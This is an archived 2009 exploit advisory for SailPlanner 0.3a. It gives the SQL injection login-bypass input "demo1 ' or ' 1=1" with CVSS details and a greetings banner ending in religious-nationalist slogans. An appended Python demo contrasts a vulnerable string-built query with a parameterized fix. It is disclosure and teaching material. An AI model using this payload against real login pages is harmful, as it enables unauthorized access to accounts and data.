SailPlanner 0.3a (Auth Bypass) SQL Injection Vulnerability

2009.08.27
Credit: jiko
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

-------------------------------------------------------------------------
--                     JIKO FroM No-exploit.Com                       ---
-------------------------------------------------------------------------
# Author : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-exploit.Com
# Script : http://relative.nl/projects.php?subMnuItem=1
=========================JIkI Team===================
# Exploit :
http://no-exploit.com
real name of admin or member
Username : demo1 ' or ' 1=1
Password : demo1 ' or ' 1=1 or JIKO or any thing
ex:
Username : demo1 ' or ' 1=1
Password : demo1 ' or ' 1=1 or JIKO or any thing
=========================JIKI Team===================
greetz : all my friends and all No-exploit members and
$ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $ MizoZ $ The-PunisheR
all muslims
visit: ==> www.no-exploit.Com
Visit: My-montada.Co.cc For your free Forum
-------------------------------------------------------------------------
--                   JIKI Team [ JIKO + KIl1er ]                       --
-------------------------------------------------------------------------
------== troops of Mohamed coming inchalah =-----------------
I am Muslim, I am Arab, I am Moroccan, my country is Morocco
[!] For all Moroccans, one by one; as my brother cyber-zone says: I am Moroccan, I am Arab, I am Muslim, bring glory or step aside [!]
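
Added example, not part of the original advisory and not SailPlanner's code: the page shows no source, so the query shape, the table and the function names below are assumptions, with Python and SQLite standing in for the application's stack. It runs the login input quoted above against a string-built query and against a parameterized one, so the difference that fixes CWE-89 is visible.

```python
import sqlite3

# Input quoted in the advisory above, entered in both form fields.
PAYLOAD = "demo1 ' or ' 1=1"

def make_db():
    """In-memory users table with constructed rows (plaintext only to keep the demo short)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("demo1", "s3cret-demo"), ("admin", "s3cret-admin")])
    return db

def build_vulnerable_sql(username, password):
    # Assumed query shape: form input pasted straight between the quotes.
    return ("SELECT username FROM users "
            f"WHERE username = '{username}' AND password = '{password}'")

def login_vulnerable(db, username, password):
    # The quotes in the input close the literal; the trailing OR ' 1=1'
    # is a non-empty numeric string, which the engine evaluates as true.
    row = db.execute(build_vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None

def login_parameterized(db, username, password):
    # Placeholders bind the input as data, so quotes in it cannot
    # terminate the string literal or add OR terms to the WHERE clause.
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_sql(PAYLOAD, PAYLOAD))
    print("string-built query :", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("parameterized query:", login_parameterized(db, PAYLOAD, PAYLOAD))
```

A production login would also store salted password hashes and compare them in application code rather than matching a plaintext column in SQL.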

References:

http://xforce.iss.net/xforce/xfdb/46932
http://www.securityfocus.com/bid/32521
http://www.milw0rm.com/exploits/7267
http://www.juniper.net/security/auto/vulnerabilities/vuln32521.html


Copyright 2024, cxsecurity.com

 
